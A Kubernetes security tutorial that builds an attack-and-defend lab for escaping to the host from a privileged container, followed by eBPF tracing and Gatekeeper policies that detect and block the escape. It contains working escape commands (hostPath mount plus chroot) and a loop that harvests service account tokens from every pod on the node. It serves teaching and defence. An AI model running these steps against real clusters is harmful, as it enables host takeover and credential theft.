Container Escape via Privileged Pod

A privileged container is one of the most dangerous misconfigurations in Kubernetes. It does not remove the container's namespaces, but it strips away most of what makes them a security boundary: the process gets every Linux capability, access to all host devices, and no seccomp or AppArmor confinement. An attacker who lands in a privileged pod can usually escape to the host in seconds.

This tutorial builds a complete attack-and-defend lab:

  1. Run a simple Docker escape locally to understand the mechanics
  2. Deploy a privileged pod in Kubernetes and escape via chroot
  3. Enumerate host secrets (SSH keys, kubeconfig, service accounts)
  4. Observe the entire attack with eBPF tracing
  5. Block the attack with Gatekeeper admission policies

Every step is self-contained: the Docker examples need nothing but Docker installed.


Why Privileged Containers Are Dangerous

When a container runs with privileged: true, the kernel treats it almost identically to a host process:

Capability            Normal container    Privileged container
Kernel modules        Blocked             Can load modules
Device access         Limited /dev        Full /dev access
Mount filesystems     Blocked             Can mount host FS
Host PID namespace    Isolated            Still isolated unless hostPID: true is also set
Host network          Isolated            Still isolated unless hostNetwork: true is also set
Seccomp profile       Applied             Disabled
AppArmor/SELinux      Applied             Disabled

A privileged container + hostPID + host filesystem mount = root on the node.
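
One quick way to see this difference from inside a container is to inspect the effective capability mask in /proc/self/status. The sketch below is illustrative and not part of the original lab: the helper names has_cap and report_caps are hypothetical, and the bit numbers (16 for CAP_SYS_MODULE, 21 for CAP_SYS_ADMIN) are taken from the Linux capability list.

```shell
#!/bin/sh
# Return success if capability bit $2 is set in the hex mask $1.
has_cap() {
    mask=$1
    bit=$2
    [ $(( (0x$mask >> bit) & 1 )) -eq 1 ]
}

# Report whether the current process holds two capabilities that a
# privileged container gains: CAP_SYS_MODULE (16) and CAP_SYS_ADMIN (21).
report_caps() {
    capeff=$(awk '/^CapEff:/ {print $2}' /proc/self/status)
    for entry in "16 CAP_SYS_MODULE" "21 CAP_SYS_ADMIN"; do
        set -- $entry
        if has_cap "$capeff" "$1"; then
            echo "$2: present"
        else
            echo "$2: absent"
        fi
    done
}

# Usage (inside any container): report_caps
```

In a default Docker container the mask is typically 00000000a80425fb, which has neither bit set; in a privileged container both should be reported as present.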


Prerequisites

For the Docker-only examples:

# Just Docker
docker --version

For the Kubernetes lab:

# minikube or kind
minikube start
# or: kind create cluster

Part 1: Docker Escape — The Simple Version

Before touching Kubernetes, let's understand the escape mechanics with plain Docker.

Step 1: Run a privileged container with host filesystem

# Run a privileged container that mounts the host root filesystem
docker run --rm -it \
    --privileged \
    -v /:/host \
    alpine:3.18 /bin/sh

You're now inside a container, but /host is the host's root filesystem.

Step 2: Escape via chroot

# Inside the container:
chroot /host

# You are now effectively root on the host
whoami
# root

hostname
# Still the container ID: chroot changes the filesystem root, not the UTS namespace

cat /etc/hostname
# Your actual machine name, read from the host's filesystem

Step 3: Read host secrets

# SSH keys
ls -la /root/.ssh/

# Docker socket — can control all containers
ls -la /var/run/docker.sock

# All running processes (if --pid=host was used)
ps aux | head -20

# Exit back to container
exit
exit

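That's it. Two steps: mount the host filesystem, then chroot into it. Strictly speaking, the -v /:/host bind mount alone is enough for this chroot; what --privileged adds is the ability to reach the host even without that mount, for example by mounting the host's disk device from /dev. This is why --privileged (privileged: true in Kubernetes) is a critical finding in any security audit.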

Step 4: Verify isolation without privileged

# Run a normal container (no --privileged, no host mount)
docker run --rm -it alpine:3.18 /bin/sh

# Try to access host filesystem
ls /host
# ls: /host: No such file or directory

# Try to mount a device
mount /dev/sda1 /mnt
# mount: permission denied (are you root?)

# Try to load a kernel module
insmod /lib/modules/test.ko
# insmod: can't insert 'test.ko': Operation not permitted

Without --privileged and without the host mount, the container stays isolated from the host.
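
To check whether anything on a Docker host is already running in privileged mode, the HostConfig.Privileged field reported by docker inspect can be queried. The following is a minimal sketch; the function name list_privileged_containers is hypothetical.

```shell
#!/bin/sh
# Print the names of running containers that were started with --privileged.
list_privileged_containers() {
    ids=$(docker ps -q) || return 1
    [ -n "$ids" ] || return 0
    # $ids is intentionally unquoted so that each ID becomes its own argument.
    docker inspect --format '{{.Name}} {{.HostConfig.Privileged}}' $ids |
        awk '$2 == "true" { sub(/^\//, "", $1); print $1 }'
}

# Usage: list_privileged_containers
```

An empty result means no running container has the flag set; it says nothing about host mounts, which would need a separate check.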


Part 2: Kubernetes Escape

Now let's do this in Kubernetes, where the blast radius is much larger — you compromise not just a container, but potentially the entire cluster.

Step 1: Deploy a normal application pod

# Create a namespace for the lab
kubectl create namespace escape-lab

# Deploy a normal, unprivileged web app
cat <<'EOF' | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: normal-app
  namespace: escape-lab
  labels:
    app: normal
spec:
  containers:
    - name: app
      image: alpine:3.18
      command: ["sleep", "infinity"]
      securityContext:
        readOnlyRootFilesystem: true
        runAsNonRoot: true
        runAsUser: 1000
        allowPrivilegeEscalation: false
EOF

kubectl wait --for=condition=Ready pod/normal-app -n escape-lab --timeout=30s

Verify it's properly isolated:

kubectl exec -n escape-lab normal-app -- whoami
# whoami: unknown uid 1000

kubectl exec -n escape-lab normal-app -- touch /tmp/test
# touch: /tmp/test: Read-only file system

kubectl exec -n escape-lab normal-app -- cat /etc/shadow
# cat: can't open '/etc/shadow': Permission denied

Step 2: Deploy the BishopFox-style attack pod

This pod has every dangerous flag enabled. It is what an attacker deploys after gaining permission to create pods:

cat <<'EOF' | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: attack-pod
  namespace: escape-lab
  labels:
    app: attack
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
    - name: attacker
      image: alpine:3.18
      securityContext:
        privileged: true
      volumeMounts:
        - mountPath: /host
          name: hostroot
      command: ["sleep", "infinity"]
  volumes:
    - name: hostroot
      hostPath:
        path: /
        type: Directory
EOF

kubectl wait --for=condition=Ready pod/attack-pod -n escape-lab --timeout=30s
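
From the defender's side, pods like this one can be spotted by listing the relevant spec fields with kubectl's custom-columns output. This is a rough sketch under a few assumptions: the function name find_risky_pods is hypothetical, only regular containers are inspected (not init containers), and missing fields are assumed to print as <none>.

```shell
#!/bin/sh
# List pods that request privileged mode or share the host PID or
# network namespace. Output: "<namespace> <pod name>" per line.
find_risky_pods() {
    kubectl get pods --all-namespaces --no-headers \
        -o custom-columns='NS:.metadata.namespace,NAME:.metadata.name,PRIV:.spec.containers[*].securityContext.privileged,HOSTPID:.spec.hostPID,HOSTNET:.spec.hostNetwork' |
        awk '$3 ~ /true/ || $4 == "true" || $5 == "true" { print $1, $2 }'
}

# Usage: find_risky_pods
```

Expect system components in kube-system to appear in the output as well; many of them legitimately need host access.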

Step 3: Escape to the host

# Enter the pod
kubectl exec -it -n escape-lab attack-pod -- /bin/sh

# Chroot to the host filesystem
chroot /host

# Verify — you're root on the Kubernetes node
whoami
# root

hostname
# The K8s node hostname

# Read the kubelet's kubeconfig (its credentials for the API server)
cat /etc/kubernetes/kubelet.conf 2>/dev/null || echo "Not a kubeadm cluster"

# List all containers on the node (via the container runtime)
crictl ps 2>/dev/null || docker ps

# Read the kubelet configuration
head -20 /var/lib/kubelet/config.yaml 2>/dev/null

# Exit
exit
exit

Step 4: Enumerate cluster secrets from the host

Once you have host access, you can steal service account tokens from every pod on the node:

kubectl exec -it -n escape-lab attack-pod -- /bin/sh -c '
echo "=== Service account tokens on this node ==="
find /host/var/lib/kubelet/pods -name "token" -type f 2>/dev/null | while IFS= read -r f; do
    echo "--- $f ---"
    head -1 "$f"
    echo ""
done
'

Each token authenticates to the API server as that pod's service account. If any of those service accounts is bound to cluster-admin, the attacker owns the entire cluster.
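
Service account tokens are JWTs, so the identity behind each one can be read without contacting the API server: the middle segment is base64url-encoded JSON whose sub claim names the service account. The helper below is a sketch; the name jwt_payload is hypothetical, and it assumes a base64 command that accepts -d.

```shell
#!/bin/sh
# Decode the payload (second dot-separated segment) of a JWT.
jwt_payload() {
    seg=$(printf '%s' "$1" | cut -d. -f2 | tr '_-' '/+')
    # base64url omits padding; restore it so that base64 -d accepts the input.
    case $(( ${#seg} % 4 )) in
        2) seg="$seg==" ;;
        3) seg="$seg=" ;;
    esac
    printf '%s' "$seg" | base64 -d
}

# Usage: jwt_payload "$(cat /path/to/token)"
```

The signature is not verified here; the function only shows which account a token claims to belong to.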


Part 3: Observe with eBPF

On the Kubernetes node (or using a monitoring DaemonSet), observe the escape in real time:

Monitor chroot calls

sudo bpftrace -e '
tracepoint:syscalls:sys_enter_chroot {
    printf("CHROOT: pid=%d comm=%s dir=%s\n",
           pid, comm, str(args->filename));
}
'

When the attacker runs chroot /host, you'll see:

CHROOT: pid=45231 comm=chroot dir=/host

Monitor host filesystem access from containers

sudo bpftrace -e '
tracepoint:syscalls:sys_enter_openat
/ comm == "sh" || comm == "cat" || comm == "find" /
{
    printf("OPEN: pid=%d comm=%s file=%s\n",
           pid, comm, str(args->filename));
}
'
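
The openat trace is noisy, so in practice its output would be narrowed down to paths that matter. The filter below is a sketch that reads the OPEN lines printed above on standard input; the function name flag_sensitive_opens and the path watchlist are hypothetical and should be adapted to the node.

```shell
#!/bin/sh
# Read "OPEN: pid=... comm=... file=..." lines on stdin and print only
# those whose path matches an adjustable watchlist of sensitive locations.
flag_sensitive_opens() {
    awk '
        /^OPEN: / {
            path = $0
            sub(/^.*file=/, "", path)
            if (path ~ /\/\.ssh\// || path ~ /\/var\/lib\/kubelet\/pods\// ||
                path ~ /\/etc\/kubernetes\// || path ~ /\/etc\/shadow$/)
                print "ALERT " $0
        }'
}

# Usage: <trace command> | flag_sensitive_opens
```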

Monitor privilege escalation indicators

sudo bpftrace -e '
tracepoint:syscalls:sys_enter_mount {
    printf("MOUNT: pid=%d comm=%s source=%s target=%s\n",
           pid, comm, str(args->dev_name), str(args->dir_name));
}

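// init_module loads from memory; finit_module (used by modern insmod/modprobe) loads from a file descriptor
tracepoint:syscalls:sys_enter_init_module,
tracepoint:syscalls:sys_enter_finit_module {
    printf("KERNEL MODULE LOAD: pid=%d comm=%s\n", pid, comm);
}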
'
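
The traces report host PIDs, not pod names. One way to tie an event back to a container is to read the process's cgroup path, which normally embeds the 64-character container ID. The sketch below assumes that layout; both function names are hypothetical, and the lookup only works while the process is still alive.

```shell
#!/bin/sh
# Extract a 64-hex-character container ID from cgroup text on stdin.
# Prints nothing if no ID is present (for example, for a host process).
container_id_from_cgroup() {
    grep -oE '[0-9a-f]{64}' | tail -n 1
}

# Look up the container ID for a PID reported by one of the traces.
container_id_for_pid() {
    container_id_from_cgroup < "/proc/$1/cgroup"
}

# Usage on the node: container_id_for_pid 45231
```

The resulting ID can then be matched against the container list from crictl ps or docker ps.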

Part 4: Block with Gatekeeper

ConstraintTemplate: Block privileged containers

# block-privileged-template.yaml
apiVersion: templates.gatekeeper.sh/v1
kind: ConstraintTemplate
metadata:
  name: k8sblockprivileged
spec:
  crd:
    spec:
      names:
        kind: K8sBlockPrivileged
  targets:
    - target: admission.k8s.gatekeeper.sh
      rego: |
        package k8sblockprivileged

        violation[{"msg": msg}] {
            c := input_containers[_]
            c.securityContext.privileged == true
            msg := sprintf(
                "Privileged container blocked: %v in %v",
                [c.name, input.review.object.metadata.name]
            )
        }

        input_containers[c] {
            c := input.review.object.spec.containers[_]
        }
        input_containers[c] {
            c := input.review.object.spec.initContainers[_]
        }
        input_containers[c] {
            c := input.review.object.spec.ephemeralContainers[_]
        }

ConstraintTemplate: Block hostPath mounts

# block-hostpath-template.yaml
apiVersion: templates.gatekeeper.sh/v1
kind: ConstraintTemplate
metadata:
  name: k8sblockhostpath
spec:
  crd:
    spec:
      names:
        kind: K8sBlockHostPath
  targets:
    - target: admission.k8s.gatekeeper.sh
      rego: |
        package k8sblockhostpath

        violation[{"msg": msg}] {
            volume := input.review.object.spec.volumes[_]
            volume.hostPath
            msg := sprintf(
                "hostPath volume blocked: %v in %v",
                [volume.name, input.review.object.metadata.name]
            )
        }

Apply the constraints

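# These steps assume Gatekeeper is already installed in the cluster
kubectl apply -f block-privileged-template.yaml
kubectl apply -f block-hostpath-template.yaml

# Create constraints that enforce the templates.
# If this fails with "no matches for kind", Gatekeeper has not finished
# creating the constraint kinds yet; wait a few seconds and retry.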
cat <<'EOF' | kubectl apply -f -
apiVersion: constraints.gatekeeper.sh/v1beta1
kind: K8sBlockPrivileged
metadata:
  name: no-privileged
spec:
  match:
    kinds:
      - apiGroups: [""]
        kinds: ["Pod"]
    excludedNamespaces: [kube-system, gatekeeper-system]
---
apiVersion: constraints.gatekeeper.sh/v1beta1
kind: K8sBlockHostPath
metadata:
  name: no-hostpath
spec:
  match:
    kinds:
      - apiGroups: [""]
        kinds: ["Pod"]
    excludedNamespaces: [kube-system]
EOF

Test — the attack pod should now be rejected

# Try to create the attack pod again
kubectl delete pod attack-pod -n escape-lab --ignore-not-found

cat <<'EOF' | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: attack-pod-blocked
  namespace: escape-lab
spec:
  hostNetwork: true
  containers:
    - name: attacker
      image: alpine:3.18
      securityContext:
        privileged: true
      volumeMounts:
        - mountPath: /host
          name: hostroot
  volumes:
    - name: hostroot
      hostPath:
        path: /
EOF

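# Expected output (approximately):
# Error from server (Forbidden): error when creating "STDIN": admission webhook
# "validation.gatekeeper.sh" denied the request:
# [no-privileged] Privileged container blocked: attacker in attack-pod-blocked
# [no-hostpath] hostPath volume blocked: hostroot in attack-pod-blocked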
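
The same check can be made without creating anything by using a server-side dry run, which still passes through admission webhooks. The wrapper below is a sketch: the function name expect_denied and the manifest file name are hypothetical, and it assumes the rejection message contains the phrase "denied the request".

```shell
#!/bin/sh
# Return success only if a server-side dry run of the manifest is
# rejected by an admission webhook. Nothing is persisted either way.
expect_denied() {
    if out=$(kubectl apply --dry-run=server -f "$1" 2>&1); then
        echo "NOT BLOCKED: $1"
        return 1
    fi
    case $out in
        *"denied the request"*) echo "blocked: $1" ;;
        *) echo "failed for another reason: $out"; return 1 ;;
    esac
}

# Usage: expect_denied attack-pod.yaml
```

Run against a set of known-bad manifests, a check like this could serve as a regression test for the policies.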

Lab Cleanup

kubectl delete namespace escape-lab --ignore-not-found
# Delete constraints before their templates: removing a template also removes the constraint kind
kubectl delete k8sblockprivileged no-privileged --ignore-not-found
kubectl delete k8sblockhostpath no-hostpath --ignore-not-found
kubectl delete constrainttemplate k8sblockprivileged k8sblockhostpath --ignore-not-found

Next Steps